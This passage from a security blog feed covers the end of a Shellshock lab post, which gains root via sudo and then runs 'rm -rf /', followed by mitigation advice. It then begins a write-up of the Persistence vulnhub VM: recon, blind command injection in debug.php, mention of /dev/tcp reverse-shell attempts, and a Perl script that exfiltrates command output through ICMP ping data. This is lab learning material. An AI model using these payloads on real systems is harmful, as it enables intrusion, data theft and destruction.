<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>sudo -l
</span><span class='line'>User pentesterlab may run the following commands on this host:
</span><span class='line'>    (root) NOPASSWD: ALL</span></code></pre></td></tr></table></div></figure>


<p>Really? All of them? Easy, let&rsquo;s spawn a root shell.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>sudo -s
</span><span class='line'>whoami
</span><span class='line'>root
</span><span class='line'>id
</span><span class='line'>uid=0(root) gid=0(root) groups=0(root)
</span><span class='line'>rm -rf /</span></code></pre></td></tr></table></div></figure>


<p>And it&rsquo;s gone.</p>

<p>Obligatory disclaimer: <em>DON&rsquo;T TRY IT AT HOME! I take no responsibility for you wiping your (or anyone else&rsquo;s) filesystem off!</em></p>

<p>Imagine if that actually happened on a production server you own, containing lots of business critical data and/or services&hellip; yeah, it was that simple (at least to get an initial shell).</p>

<h2>Mitigation</h2>

<p>Since you have seen how easy it is to compromise vulnerable servers, the next question is, how to mitigate it?</p>

<p>First and foremost, that&rsquo;s a general advice, keep your system patched and up-to-date! As soon as a critical security patch is released, apply it! Especially on your Internet facing servers as they WILL sooner or later be scanned and heaps of exploits fired at them.</p>

<p>With this particular &ldquo;Shellshock&rdquo; vulnerability, vendors weren&rsquo;t great regarding releasing a patch. It took them a while and the patch that was released actually didn&rsquo;t fix the vulnerability completely (hence another 4 or so CVEs emerging shortly after the inital one).</p>

<p>So, what else can you do? Well, your environment set-up may come to the rescue here. Generally your Internet facing servers would be sitting behind a set of load balancers, proxies and firewalls - this <em>may</em> provide sufficient protection in some cases (e.g. egress firewall rules restricting outbound traffic, load balancers splitting traffic onto different servers, etc.).</p>

<p>If you have an IPS, deploy the rules to block malicious traffic - but as with IPSes, you may need to deal with false-positives. If you have an IDS, get a team to monitor it for alerts triggering on exploit traffic, analyse responses and potentially block abusing IP (but it&rsquo;s kind of a whack-a-mole game at that point).</p>

<p>And of course, as a general rule of thumb, if you don&rsquo;t need it - disable it! Use KSH or CSH or anything else instead (if you can).</p>

<p>There was (and probably still is), quite a bit of panic around this particular vulnerability, however, there must be quite a lot of conditions satisfied to successfully exploit it, therefore I don&rsquo;t think it&rsquo;s actually THAT easy to exploit it in the wild. Of course, there will be (and already are) instances of breaches utilising this vulnerability, but they would be quite specifically crafted for targeted environment. You probably won&rsquo;t be hugely successful going around and spraying an entire Internet with the same payload and hoping for the best&hellip; Heartbleed was a lot easier in that regard, but that&rsquo;s a completely different story :)</p>
]]></content>
  </entry>
  
  <entry>
    <title type="html"><![CDATA[Persistence VM Writeup]]></title>
    <link href="http://blog.knapsy.com/blog/2014/10/05/persistence-vm-writeup/"/>
    <updated>2014-10-05T23:02:09+11:00</updated>
    <id>http://blog.knapsy.com/blog/2014/10/05/persistence-vm-writeup</id>
    <content type="html"><![CDATA[<p>Persistence was a new VM available at <a href="http://www.vulnhub.com/">vulnhub.com</a> provided by sagi and <a href="https://twitter.com/superkojiman">superkojiman</a> and there was actually an entire competition going on for a whole month based around it.</p>

<p>I decided to try myself and see how far I will be able to get to&hellip; and because I&rsquo;m the type who doesn&rsquo;t give up easily, I managed to finally get a root shell and learn A LOT all the way throughout the challange. I wanted to document everything I did as it could be a good reference point for me in the future and maybe some people will also be able to benefit from it. So&hellip; let&rsquo;s get to it!</p>

<!-- more -->


<h2>Introduction</h2>

<p>Ok, let&rsquo;s get it started! At first, I didn&rsquo;t really know what to expect from the challange, certainly not digging into the level of details I did, but man, I enjoyed it so much and learnt heaps! Anyway, let&rsquo;s get down to business.</p>

<p>Booted up Persistence VM, started up my Kali VM and let&rsquo;s go.</p>

<h2>Recon</h2>

<p>Let&rsquo;s find out the IP address of Persistence, both Kali and Persistence are running in Host only networking mode in my VMWare Fusion so since they&rsquo;re on the same network, they&rsquo;re able to communicate with each other. Lets use netdiscover on ethernet interface to find out:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# netdiscover -i eth0
</span><span class='line'> Currently scanning: 172.18.162.0/16   |   Screen View: Unique Hosts           
</span><span class='line'>                                                                               
</span><span class='line'> 18 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 1080             
</span><span class='line'> _____________________________________________________________________________
</span><span class='line'>   IP            At MAC Address      Count  Len   MAC Vendor                   
</span><span class='line'> ----------------------------------------------------------------------------- 
</span><span class='line'> 172.16.246.1    00:50:56:c0:00:01    14    840   VMWare, Inc.                 
</span><span class='line'> 172.16.246.128  00:0c:29:3a:9e:ba    02    120   VMware, Inc.                 
</span><span class='line'> 172.16.246.254  00:50:56:e9:6d:00    02    120   VMWare, Inc.                 </span></code></pre></td></tr></table></div></figure>


<p>Cool, so now we&rsquo;ve got the IP address, let&rsquo;s see what ports and services are listening:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# nmap -sV -A 172.16.246.128
</span><span class='line'>
</span><span class='line'>Starting Nmap 6.47 ( http://nmap.org ) at 2014-09-28 17:50 EST
</span><span class='line'>Nmap scan report for 172.16.246.128
</span><span class='line'>Host is up (0.00044s latency).
</span><span class='line'>Not shown: 999 filtered ports
</span><span class='line'>PORT   STATE SERVICE VERSION
</span><span class='line'>80/tcp open  http    nginx 1.4.7
</span><span class='line'>|_http-methods: No Allow or Public header in OPTIONS response (status code 405)
</span><span class='line'>|_http-title: The Persistence of Memory - Salvador Dali
</span><span class='line'>MAC Address: 00:0C:29:3A:9E:BA (VMware)
</span><span class='line'>Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
</span><span class='line'>Device type: general purpose
</span><span class='line'>Running: Linux 2.6.X|3.X
</span><span class='line'>OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
</span><span class='line'>OS details: Linux 2.6.32 - 3.10
</span><span class='line'>Network Distance: 1 hop
</span><span class='line'>
</span><span class='line'>TRACEROUTE
</span><span class='line'>HOP RTT     ADDRESS
</span><span class='line'>1   0.44 ms 172.16.246.128
</span><span class='line'>
</span><span class='line'>OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
</span><span class='line'>Nmap done: 1 IP address (1 host up) scanned in 25.97 seconds</span></code></pre></td></tr></table></div></figure>


<p>Ha, we have a webserver listetning on port 80 (well, kinda expected) - let&rsquo;s see what&rsquo;s in there. Open up Icewessel and poke around. Unfortunately except a pretty picture there&rsquo;s nothing interesting in there. Check the source, nothing in there either. Okay, let&rsquo;s poke around a bit more - open up dirbuster and try to find something else.</p>

<p>Using dirbuster wordlist that came with Kali, didn&rsquo;t take long to find debug.php page:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# dirbuster
</span><span class='line'>28/09/2014 6:02:23 PM java.util.prefs.FileSystemPreferences$2 run
</span><span class='line'>INFO: Created user preferences directory.
</span><span class='line'>Starting OWASP DirBuster 1.0-RC1
</span><span class='line'>Starting dir/file list based brute forcing
</span><span class='line'>Dir found: / - 200
</span><span class='line'>File found: /debug.php - 200</span></code></pre></td></tr></table></div></figure>


<h2>Blind command injection</h2>

<p>Awesome, looks like we can try to do something here. First thought - command injection! But let&rsquo;s see how the site is supposed to work - allegedly it&rsquo;s for pinging addresses, so I typed in &ldquo;localhost&rdquo; and clicked submit. You can see that the server is &ldquo;thinking&rdquo; a bit and returns to the page without displaying any results. When you provide an invalid input &ldquo;blah&rdquo;, it comes back to the form straight away and also doesn&rsquo;t display any results.</p>

<p>Ok, if there is a command injection vulnerability, it&rsquo;ll be a blind command injection and we&rsquo;ll either need to hope that the command just works (e.g. trying to spawn a shell) or we&rsquo;ll need to come up with some way to send results back to us.</p>

<p>Let&rsquo;s first see if there&rsquo;s a command injection vulnerability. The simplest way would be to try to ping back our host, so I have started packet capture and typed in the following in our webform:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>localhost; ping -c 1 172.16.246.129</span></code></pre></td></tr></table></div></figure>


<p>Ha! It is vulnerable as we can see ping packet coming back to our host:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# tcpdump -i eth0 -n icmp
</span><span class='line'>tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
</span><span class='line'>listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
</span><span class='line'>18:19:34.216444 IP 172.16.246.128 &gt; 172.16.246.129: ICMP echo request, id 63238, seq 1, length 64
</span><span class='line'>18:19:34.216480 IP 172.16.246.129 &gt; 172.16.246.128: ICMP echo reply, id 63238, seq 1, length 64</span></code></pre></td></tr></table></div></figure>


<p>So now we need to find out what we can actually do with it. I&rsquo;ve come up with a one-liner to test out number of commands that we can utilise:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>localhost; command; if [ $? -eq 0 ]; then ping -c 1 172.16.246.129; fi</span></code></pre></td></tr></table></div></figure>


<p>It&rsquo;ll ping me back if the &lsquo;command&rsquo; is successful. From now on I started running all bunch of different commands to find out what I can actually do on the system and what potential shells I could spawn. I tried number of various commands such as:</p>

<ul>
<li>ls /usr/bin/python</li>
<li>touch /tmp/test</li>
<li>echo &ldquo;test&rdquo; > /tmp/test</li>
<li>&hellip; and many many more.</li>
</ul>


<p>Some of them returned success, so it gave me pretty good idea what I may be able to do here.</p>

<p>Next, I started playing around with shells - I was trying to spawn various TCP shells using either python or native bash (with redirections to /dev/tcp/172.16.246.129/31337), but with no success. I tried researching and attempting to spawn some UDP shells, but also with not much luck.</p>

<p>After many many hours of trying everything I could think of, it seemed that pretty much everything except ping is being blocked by a firewall. I was tempted to start looking into spawning shells over ICMP, but after quick research I couldn&rsquo;t really find any way of doing it without additional software that I would need to put on persistence, so my next step was trying to find a way of sending back output of my commands. Back to basics, RTFM:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>man ping</span></code></pre></td></tr></table></div></figure>


<p>Hmmm, something interesting, -p option (sending data in the data portion of the icmp packet)&hellip; I could use that to send back output back to myself! I can only send 56 bytes at a time, but that&rsquo;s ok - I&rsquo;ll just split the response into number of chunks and send them over one-by-one.</p>

<p>I have created a Perl script to send out commands to persistence via vulnerable debug.php, run output via xxd and save it in a hex format in a temp file, read the output file 16 characters at a time and send it back in a data portion of the icmp packet. This way it&rsquo;ll be a lot easier for me to run number of commands quickly without trying to type it in and modify in this small text field on debug.php site.</p>

<figure class='code'><figcaption><span>Post form data </span></figcaption>
<div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
</pre></td><td class='code'><pre><code class='perl'><span class='line'><span class="c1">#!/usr/bin/perl</span>
</span><span class='line'>
</span><span class='line'><span class="c1"># Target URL</span>
</span><span class='line'><span class="nv">$target_url</span><span class="o">=</span><span class="s">&#39;http://172.16.246.128/debug.php&#39;</span><span class="p">;</span>
</span><span class='line'>
</span><span class='line'><span class="c1"># Host IP</span>
</span><span class='line'><span class="nv">$host_ip</span><span class="o">=</span><span class="s">&#39;172.16.246.129&#39;</span><span class="p">;</span>
</span><span class='line'>
</span><span class='line'><span class="c1">#Command to run </span>
</span><span class='line'><span class="nv">$CMD</span><span class="o">=</span><span class="s">&#39;pwd&#39;</span><span class="p">;</span>
</span><span class='line'>
</span><span class='line'><span class="k">use</span> <span class="n">LWP</span><span class="p">;</span>
</span><span class='line'><span class="k">use</span> <span class="nn">HTTP::Request::</span><span class="n">Common</span><span class="p">;</span>
</span><span class='line'><span class="nv">$ua</span> <span class="o">=</span> <span class="nv">$ua</span> <span class="o">=</span> <span class="nn">LWP::</span><span class="n">UserAgent</span><span class="o">-&gt;</span><span class="k">new</span><span class="p">;;</span>
</span><span class='line'><span class="nv">$res</span> <span class="o">=</span> <span class="nv">$ua</span><span class="o">-&gt;</span><span class="n">request</span><span class="p">(</span><span class="n">POST</span> <span class="nv">$target_url</span><span class="p">,</span>
</span><span class='line'><span class="n">Content_Type</span> <span class="o">=&gt;</span> <span class="s">&#39;form-data&#39;</span><span class="p">,</span>
</span><span class='line'><span class="n">Content</span> <span class="o">=&gt;</span> <span class="p">[</span>
</span><span class='line'><span class="n">addr</span> <span class="o">=&gt;</span> <span class="s">&quot;localhost; COMMAND=\&quot;$CMD\&quot;; \$COMMAND 2&gt;&amp;1 | xxd -p &gt; /tmp/\$COMMAND.hex; while read -n 16 hex; do ping -c 1 -p \$hex $host_ip; done &lt; /tmp/\$COMMAND.hex;&quot;</span><span class="p">]);</span>
</span></code></pre></td></tr></table></div></figure>


<p>So, first test with pwd command (as in the above source). Again, I&rsquo;ve started tcpdump (this time with -X option to also display data portion of the packet) and let&rsquo;s see what happens:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~/data/scripts/send-command# ./send_command</span></code></pre></td></tr></table></div></figure>


<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
<span class='line-number'>35</span>
<span class='line-number'>36</span>
<span class='line-number'>37</span>
<span class='line-number'>38</span>
<span class='line-number'>39</span>
<span class='line-number'>40</span>
<span class='line-number'>41</span>
<span class='line-number'>42</span>
<span class='line-number'>43</span>
<span class='line-number'>44</span>
<span class='line-number'>45</span>
<span class='line-number'>46</span>
<span class='line-number'>47</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# tcpdump -i eth0 -n icmp -X
</span><span class='line'>tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
</span><span class='line'>listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
</span><span class='line'>
</span><span class='line'>
</span><span class='line'>19:12:48.296955 IP 172.16.246.128 &gt; 172.16.246.129: ICMP echo request, id 24328, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 0000 4000 4001 f585 ac10 f680  E..T..@.@.......
</span><span class='line'>  0x0010:  ac10 f681 0800 98ae 5f08 0001 1b5a 2854  ........_....Z(T
</span><span class='line'>  0x0020:  5c30 0000 2f75 7372 2f73 6861 2f75 7372  \0../usr/sha/usr
</span><span class='line'>  0x0030:  2f73 6861 2f75 7372 2f73 6861 2f75 7372  /sha/usr/sha/usr
</span><span class='line'>  0x0040:  2f73 6861 2f75 7372 2f73 6861 2f75 7372  /sha/usr/sha/usr
</span><span class='line'>  0x0050:  2f73 6861                                /sha
</span><span class='line'>19:12:48.297021 IP 172.16.246.129 &gt; 172.16.246.128: ICMP echo reply, id 24328, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 e0a4 0000 4001 54e1 ac10 f681  E..T....@.T.....
</span><span class='line'>  0x0010:  ac10 f680 0000 a0ae 5f08 0001 1b5a 2854  ........_....Z(T
</span><span class='line'>  0x0020:  5c30 0000 2f75 7372 2f73 6861 2f75 7372  \0../usr/sha/usr
</span><span class='line'>  0x0030:  2f73 6861 2f75 7372 2f73 6861 2f75 7372  /sha/usr/sha/usr
</span><span class='line'>  0x0040:  2f73 6861 2f75 7372 2f73 6861 2f75 7372  /sha/usr/sha/usr
</span><span class='line'>  0x0050:  2f73 6861                                /sha
</span><span class='line'>19:12:48.298002 IP 172.16.246.128 &gt; 172.16.246.129: ICMP echo request, id 24584, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 0000 4000 4001 f585 ac10 f680  E..T..@.@.......
</span><span class='line'>  0x0010:  ac10 f681 0800 00d3 6008 0001 1b5a 2854  ........`....Z(T
</span><span class='line'>  0x0020:  8534 0000 7265 2f6e 6769 6e78 7265 2f6e  .4..re/nginxre/n
</span><span class='line'>  0x0030:  6769 6e78 7265 2f6e 6769 6e78 7265 2f6e  ginxre/nginxre/n
</span><span class='line'>  0x0040:  6769 6e78 7265 2f6e 6769 6e78 7265 2f6e  ginxre/nginxre/n
</span><span class='line'>  0x0050:  6769 6e78                                ginx
</span><span class='line'>19:12:48.298021 IP 172.16.246.129 &gt; 172.16.246.128: ICMP echo reply, id 24584, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 e0a5 0000 4001 54e0 ac10 f681  E..T....@.T.....
</span><span class='line'>  0x0010:  ac10 f680 0000 08d3 6008 0001 1b5a 2854  ........`....Z(T
</span><span class='line'>  0x0020:  8534 0000 7265 2f6e 6769 6e78 7265 2f6e  .4..re/nginxre/n
</span><span class='line'>  0x0030:  6769 6e78 7265 2f6e 6769 6e78 7265 2f6e  ginxre/nginxre/n
</span><span class='line'>  0x0040:  6769 6e78 7265 2f6e 6769 6e78 7265 2f6e  ginxre/nginxre/n
</span><span class='line'>  0x0050:  6769 6e78                                ginx
</span><span class='line'>19:12:48.298980 IP 172.16.246.128 &gt; 172.16.246.129: ICMP echo request, id 24840, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 0000 4000 4001 f585 ac10 f680  E..T..@.@.......
</span><span class='line'>  0x0010:  ac10 f681 0800 4e0f 6108 0001 1b5a 2854  ......N.a....Z(T
</span><span class='line'>  0x0020:  8638 0000 746d 6c0a 2f68 746d 6c0a 2f68  .8..tml./html./h
</span><span class='line'>  0x0030:  746d 6c0a 2f68 746d 6c0a 2f68 746d 6c0a  tml./html./html.
</span><span class='line'>  0x0040:  2f68 746d 6c0a 2f68 746d 6c0a 2f68 746d  /html./html./htm
</span><span class='line'>  0x0050:  6c0a 2f68                                l./h
</span><span class='line'>19:12:48.298990 IP 172.16.246.129 &gt; 172.16.246.128: ICMP echo reply, id 24840, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 e0a6 0000 4001 54df ac10 f681  E..T....@.T.....
</span><span class='line'>  0x0010:  ac10 f680 0000 560f 6108 0001 1b5a 2854  ......V.a....Z(T
</span><span class='line'>  0x0020:  8638 0000 746d 6c0a 2f68 746d 6c0a 2f68  .8..tml./html./h
</span><span class='line'>  0x0030:  746d 6c0a 2f68 746d 6c0a 2f68 746d 6c0a  tml./html./html.
</span><span class='line'>  0x0040:  2f68 746d 6c0a 2f68 746d 6c0a 2f68 746d  /html./html./htm
</span><span class='line'>  0x0050:  6c0a 2f68                                l./h</span></code></pre></td></tr></table></div></figure>


<p>Woohoo, getting some data back! A bit hard to read, but we can manage - output of this one is &lsquo;/usr/share/nginx/html&rsquo;.</p>

<p>Alright, let&rsquo;s see what else do we have here - try ls command. Modify source of my script a bit ($CMD=&lsquo;ls&rsquo;) and send it through. Hmmmmm&hellip; something interesting in the output:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
<span class='line-number'>35</span>
<span class='line-number'>36</span>
<span class='line-number'>37</span>
<span class='line-number'>38</span>
<span class='line-number'>39</span>
<span class='line-number'>40</span>
<span class='line-number'>41</span>
<span class='line-number'>42</span>
<span class='line-number'>43</span>
<span class='line-number'>44</span>
<span class='line-number'>45</span>
<span class='line-number'>46</span>
<span class='line-number'>47</span>
<span class='line-number'>48</span>
<span class='line-number'>49</span>
<span class='line-number'>50</span>
<span class='line-number'>51</span>
<span class='line-number'>52</span>
<span class='line-number'>53</span>
<span class='line-number'>54</span>
<span class='line-number'>55</span>
<span class='line-number'>56</span>
<span class='line-number'>57</span>
<span class='line-number'>58</span>
<span class='line-number'>59</span>
<span class='line-number'>60</span>
<span class='line-number'>61</span>
<span class='line-number'>62</span>
<span class='line-number'>63</span>
<span class='line-number'>64</span>
<span class='line-number'>65</span>
<span class='line-number'>66</span>
<span class='line-number'>67</span>
<span class='line-number'>68</span>
<span class='line-number'>69</span>
<span class='line-number'>70</span>
<span class='line-number'>71</span>
<span class='line-number'>72</span>
<span class='line-number'>73</span>
<span class='line-number'>74</span>
<span class='line-number'>75</span>
<span class='line-number'>76</span>
<span class='line-number'>77</span>
<span class='line-number'>78</span>
<span class='line-number'>79</span>
<span class='line-number'>80</span>
<span class='line-number'>81</span>
<span class='line-number'>82</span>
<span class='line-number'>83</span>
<span class='line-number'>84</span>
<span class='line-number'>85</span>
<span class='line-number'>86</span>
<span class='line-number'>87</span>
<span class='line-number'>88</span>
<span class='line-number'>89</span>
<span class='line-number'>90</span>
<span class='line-number'>91</span>
<span class='line-number'>92</span>
<span class='line-number'>93</span>
<span class='line-number'>94</span>
<span class='line-number'>95</span>
<span class='line-number'>96</span>
<span class='line-number'>97</span>
<span class='line-number'>98</span>
<span class='line-number'>99</span>
<span class='line-number'>100</span>
<span class='line-number'>101</span>
<span class='line-number'>102</span>
<span class='line-number'>103</span>
<span class='line-number'>104</span>
<span class='line-number'>105</span>
<span class='line-number'>106</span>
<span class='line-number'>107</span>
<span class='line-number'>108</span>
<span class='line-number'>109</span>
<span class='line-number'>110</span>
<span class='line-number'>111</span>
<span class='line-number'>112</span>
<span class='line-number'>113</span>
<span class='line-number'>114</span>
<span class='line-number'>115</span>
<span class='line-number'>116</span>
<span class='line-number'>117</span>
<span class='line-number'>118</span>
<span class='line-number'>119</span>
<span class='line-number'>120</span>
<span class='line-number'>121</span>
<span class='line-number'>122</span>
<span class='line-number'>123</span>
<span class='line-number'>124</span>
<span class='line-number'>125</span>
<span class='line-number'>126</span>
<span class='line-number'>127</span>
<span class='line-number'>128</span>
<span class='line-number'>129</span>
<span class='line-number'>130</span>
<span class='line-number'>131</span>
<span class='line-number'>132</span>
<span class='line-number'>133</span>
<span class='line-number'>134</span>
<span class='line-number'>135</span>
<span class='line-number'>136</span>
<span class='line-number'>137</span>
<span class='line-number'>138</span>
<span class='line-number'>139</span>
<span class='line-number'>140</span>
<span class='line-number'>141</span>
<span class='line-number'>142</span>
<span class='line-number'>143</span>
<span class='line-number'>144</span>
<span class='line-number'>145</span>
<span class='line-number'>146</span>
<span class='line-number'>147</span>
<span class='line-number'>148</span>
<span class='line-number'>149</span>
<span class='line-number'>150</span>
<span class='line-number'>151</span>
<span class='line-number'>152</span>
<span class='line-number'>153</span>
<span class='line-number'>154</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>19:19:17.227286 IP 172.16.246.128 &gt; 172.16.246.129: ICMP echo request, id 42760, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 0000 4000 4001 f585 ac10 f680  E..T..@.@.......
</span><span class='line'>  0x0010:  ac10 f681 0800 ca27 a708 0001 9f5b 2854  .......'.....[(T
</span><span class='line'>  0x0020:  fa74 0e00 6465 6275 672e 7068 6465 6275  .t..debug.phdebu
</span><span class='line'>  0x0030:  672e 7068 6465 6275 672e 7068 6465 6275  g.phdebug.phdebu
</span><span class='line'>  0x0040:  672e 7068 6465 6275 672e 7068 6465 6275  g.phdebug.phdebu
</span><span class='line'>  0x0050:  672e 7068                                g.ph
</span><span class='line'>19:19:17.227311 IP 172.16.246.129 &gt; 172.16.246.128: ICMP echo reply, id 42760, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 e0a7 0000 4001 54de ac10 f681  E..T....@.T.....
</span><span class='line'>  0x0010:  ac10 f680 0000 d227 a708 0001 9f5b 2854  .......'.....[(T
</span><span class='line'>  0x0020:  fa74 0e00 6465 6275 672e 7068 6465 6275  .t..debug.phdebu
</span><span class='line'>  0x0030:  672e 7068 6465 6275 672e 7068 6465 6275  g.phdebug.phdebu
</span><span class='line'>  0x0040:  672e 7068 6465 6275 672e 7068 6465 6275  g.phdebug.phdebu
</span><span class='line'>  0x0050:  672e 7068                                g.ph
</span><span class='line'>19:19:17.228091 IP 172.16.246.128 &gt; 172.16.246.129: ICMP echo request, id 43016, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 0000 4000 4001 f585 ac10 f680  E..T..@.@.......
</span><span class='line'>  0x0010:  ac10 f681 0800 b681 a808 0001 9f5b 2854  .............[(T
</span><span class='line'>  0x0020:  7f78 0e00 700a 696e 6465 782e 700a 696e  .x..p.index.p.in
</span><span class='line'>  0x0030:  6465 782e 700a 696e 6465 782e 700a 696e  dex.p.index.p.in
</span><span class='line'>  0x0040:  6465 782e 700a 696e 6465 782e 700a 696e  dex.p.index.p.in
</span><span class='line'>  0x0050:  6465 782e                                dex.
</span><span class='line'>19:19:17.228100 IP 172.16.246.129 &gt; 172.16.246.128: ICMP echo reply, id 43016, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 e0a8 0000 4001 54dd ac10 f681  E..T....@.T.....
</span><span class='line'>  0x0010:  ac10 f680 0000 be81 a808 0001 9f5b 2854  .............[(T
</span><span class='line'>  0x0020:  7f78 0e00 700a 696e 6465 782e 700a 696e  .x..p.index.p.in
</span><span class='line'>  0x0030:  6465 782e 700a 696e 6465 782e 700a 696e  dex.p.index.p.in
</span><span class='line'>  0x0040:  6465 782e 700a 696e 6465 782e 700a 696e  dex.p.index.p.in
</span><span class='line'>  0x0050:  6465 782e                                dex.
</span><span class='line'>19:19:17.228811 IP 172.16.246.128 &gt; 172.16.246.129: ICMP echo request, id 43272, seq 1, length 64
</span><span class='line'>  0x0000:  4500 0054 0000 4000 4001 f585 ac10 f680  E..T..@.@.......
</span><span class='line'>  0x0010:  ac10 f681 0800 9437 a908 0001 9f5b 2854  .......7.....[(T
</span><span class='line'>  0x0020:  427b 0e00 6874 6d6c 0a70 6572 6874 6d6c  B{..html.perhtml
</span><span class='line'>  0x0030:  0a70 6572 6874 6d6c 0a70 6572 6874 6d6c  .perhtml.perhtml
</span><span class='line'>  0x0040:  0a70 6572 6874 6d6c 0a70 6572 6874 6d6c  .perhtml.perhtml
</span><span class='line'>  0x0050:  0a70 6572                                .per
